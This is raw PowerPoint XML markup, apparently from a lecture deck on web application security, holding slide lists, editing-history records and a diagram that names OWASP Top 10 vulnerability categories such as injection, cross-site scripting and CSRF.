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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId30"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId31"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="388" r:id="rId3"/>
    <p:sldId id="389" r:id="rId4"/>
    <p:sldId id="390" r:id="rId5"/>
    <p:sldId id="402" r:id="rId6"/>
    <p:sldId id="403" r:id="rId7"/>
    <p:sldId id="404" r:id="rId8"/>
    <p:sldId id="405" r:id="rId9"/>
    <p:sldId id="406" r:id="rId10"/>
    <p:sldId id="407" r:id="rId11"/>
    <p:sldId id="408" r:id="rId12"/>
    <p:sldId id="400" r:id="rId13"/>
    <p:sldId id="392" r:id="rId14"/>
    <p:sldId id="394" r:id="rId15"/>
    <p:sldId id="395" r:id="rId16"/>
    <p:sldId id="396" r:id="rId17"/>
    <p:sldId id="399" r:id="rId18"/>
    <p:sldId id="398" r:id="rId19"/>
    <p:sldId id="421" r:id="rId20"/>
    <p:sldId id="401" r:id="rId21"/>
    <p:sldId id="409" r:id="rId22"/>
    <p:sldId id="382" r:id="rId23"/>
    <p:sldId id="383" r:id="rId24"/>
    <p:sldId id="384" r:id="rId25"/>
    <p:sldId id="385" r:id="rId26"/>
    <p:sldId id="386" r:id="rId27"/>
    <p:sldId id="387" r:id="rId28"/>
    <p:sldId id="381" r:id="rId29"/>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37" autoAdjust="0"/>
    <p:restoredTop sz="74623" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54" d="100"/>
        </p:scale>
        <p:origin x="2064" y="29"/>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h Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}"/>
    <pc:docChg chg="delSld">
      <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4246264776" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2365078065" sldId="258"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3712452287" sldId="261"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2840790778" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3484849609" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4022768838" sldId="269"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1751659793" sldId="271"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1642179003" sldId="272"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3815382118" sldId="275"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1760924291" sldId="276"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3401187823" sldId="277"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2354606611" sldId="278"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="295"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3096311111" sldId="422"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{336F4784-210F-43F8-84A5-5906E180078D}" dt="2023-08-23T08:33:46.861" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="545993211" sldId="423"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}"/>
    <pc:docChg chg="custSel modSld modMainMaster">
      <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:57:41.761" v="47" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp mod">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:34:52.229" v="0" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:34:52.229" v="0" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="256"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:40:19.778" v="13" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1760924291" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:40:19.778" v="13" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1760924291" sldId="276"/>
            <ac:spMk id="3" creationId="{68F82708-9DA8-4A05-B58E-BBA7D4B90F6D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:57:41.761" v="47" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:57:41.761" v="47" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="295"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modNotesTx">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:44:05.382" v="18" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2200128184" sldId="392"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:44:05.382" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2200128184" sldId="392"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldMasterChg chg="modSldLayout">
        <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:36:27.912" v="1" actId="478"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="913487552" sldId="2147483749"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:36:27.912" v="1" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="913487552" sldId="2147483749"/>
            <pc:sldLayoutMk cId="2930726544" sldId="2147483750"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Anh Nguyen Duc" userId="04a5c95d-4a59-4e21-b199-e9922fb46c5c" providerId="ADAL" clId="{8A03A2AF-DD87-4A0D-A7B3-8352E8E45767}" dt="2022-12-13T22:36:27.912" v="1" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="913487552" sldId="2147483749"/>
              <pc:sldLayoutMk cId="2930726544" sldId="2147483750"/>
              <ac:spMk id="12"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7281CF-8B67-4D2B-AFDC-72ADEAA7440C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default#1" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d6" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent6_2" csCatId="accent6" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64169CBD-621B-41AC-8098-190EB836285B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A1: Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2478B4C-85CC-4B56-8035-A1D085B2572C}" type="parTrans" cxnId="{E8FA1B3E-891C-44F5-8B95-213F7D5CE5C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55DCDCCE-3CAF-428A-ABFC-A8BC8FEF6AA5}" type="sibTrans" cxnId="{E8FA1B3E-891C-44F5-8B95-213F7D5CE5C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{231AA091-BC50-4CB1-B212-84DF97C37E43}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="FF0000"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>A10: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0" err="1">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Unvalidated</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t> Redirects and Forwards</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9F48C2C-FB58-44F1-8762-0ACF43D4AFFD}" type="sibTrans" cxnId="{395778C8-53B7-4ABA-B003-A8A213D8106E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFD4E4B3-889C-44E4-98F7-CDE5F5A9E369}" type="parTrans" cxnId="{395778C8-53B7-4ABA-B003-A8A213D8106E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA4512F7-A63A-4F40-B5B4-6004D8EEA2E4}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:gradFill flip="none" rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="0066CC">
                <a:shade val="30000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="0066CC">
                <a:shade val="67500"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0066CC">
                <a:shade val="100000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>A7: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Failure to Restrict URL Access</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7E858A2-0BF8-451A-8FF3-814E21CFC0A2}" type="sibTrans" cxnId="{A25FC508-31D3-47AB-B526-F240B6F5C2DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D53CD27D-BDD3-444C-AE6A-2311E83F246A}" type="parTrans" cxnId="{A25FC508-31D3-47AB-B526-F240B6F5C2DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8BCDC084-67CA-4889-BB16-FDAA18262BAD}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="FF0000"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>A6: Security </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
            <a:t>Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C306F358-4A0E-4076-9570-D654E65D82B2}" type="sibTrans" cxnId="{87367C5A-800E-4ABA-8B2B-CF70A5C89137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFCC82B9-B307-4045-991F-0A63623D1F34}" type="parTrans" cxnId="{87367C5A-800E-4ABA-8B2B-CF70A5C89137}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1059736-A6E2-4762-8F49-0456CD8B7C69}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A5: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Cross Site Request Forgery (CSRF) </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C998CC39-D1D3-43DE-8252-4B94A9279E42}" type="sibTrans" cxnId="{63E0B01F-E6B0-4341-846D-AEB7BCF19307}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBCB215F-2702-4FBF-9B10-EE479A00694C}" type="parTrans" cxnId="{63E0B01F-E6B0-4341-846D-AEB7BCF19307}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A4: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="ja-JP" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Insecure Direct Object References </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{678EE478-5D87-49D0-AC29-0A904E85A9CD}" type="sibTrans" cxnId="{62F5A9D3-EBF9-4BEC-9613-FD255126CCE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C77C0D7A-4688-41D5-A7B6-ECC1745C80BA}" type="parTrans" cxnId="{62F5A9D3-EBF9-4BEC-9613-FD255126CCE1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05B6A14E-A58A-427E-80F5-495E20005676}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A3: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Broken Authentication and Session Management</a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E232C4F9-D265-42B7-A469-2C93E3FE3984}" type="sibTrans" cxnId="{AE4E6705-38DF-4ECA-80E1-760699C4E255}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F9BC56F-924A-4353-9F8F-40E52BE6F39F}" type="parTrans" cxnId="{AE4E6705-38DF-4ECA-80E1-760699C4E255}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{267067DC-F960-471F-8C6E-E0A998CDE8CA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A2: Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D761F71C-31BB-498F-A08E-70F30EB51CB4}" type="parTrans" cxnId="{376E3F9D-D0A5-4750-A982-6A39581A8CFA}">
      <dgm:prSet/>
